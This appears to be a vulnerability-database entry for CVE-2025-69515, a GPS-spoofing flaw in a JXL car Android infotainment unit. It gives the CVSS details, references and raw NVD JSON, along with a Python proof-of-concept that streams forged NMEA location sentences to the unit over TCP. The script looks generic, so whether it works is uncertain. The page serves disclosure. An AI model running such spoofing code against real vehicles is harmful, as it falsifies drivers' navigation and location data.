CVE-2025-69515

Description

An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

JXL 9 Inch Car Android Double Din Player Android v12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for GPS Spoofing on JXL Infotainment System
# This script simulates sending malicious NMEA sentences to a target service.

import socket
import time

TARGET_IP = "192.168.1.100" # Example IP of the car infotainment system
TARGET_PORT = 2947 # Common port for GPS data services

# Malicious NMEA sentence (Location: Eiffel Tower)
# Format: $GPGGA,Time,Latitude,N,Longitude,E,Quality,NumSatellites,HDOP,Altitude,M,GeoidSep,M,Checksum*Checksum
FAKE_NMEA = "$GPGGA,092750.000,4851.0000,N,00220.0000,E,1,08,0.9,545.4,M,46.9,M,,*47\r\n"

def send_spoofed_gps():
    try:
        print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...")
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((TARGET_IP, TARGET_PORT))
        print("[+] Connection established. Sending spoofed GPS data...")
        
        while True:
            # Send the fake NMEA sentence
            s.send(FAKE_NMEA.encode('ascii'))
            print(f"[Sent] {FAKE_NMEA.strip()}")
            time.sleep(1) # Send continuously to override real GPS
            
    except socket.error as e:
        print(f"[-] Socket Error: {e}")
    except KeyboardInterrupt:
        print("\n[*] Stopping PoC.")
    finally:
        s.close()

if __name__ == "__main__":
    send_spoofed_gps()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69515
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69515
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69515/
[4] VulDB https://vuldb.com/cve/CVE-2025-69515
[5] http://jxl.com
[6] https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69515", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:22.950", "lastModified": "2026-04-09T15:16:08.863", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-941"}]}], "references": [{"url": "http://jxl.com", "source": "[email protected]"}, {"url": "https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md", "source": "[email protected]"}]}}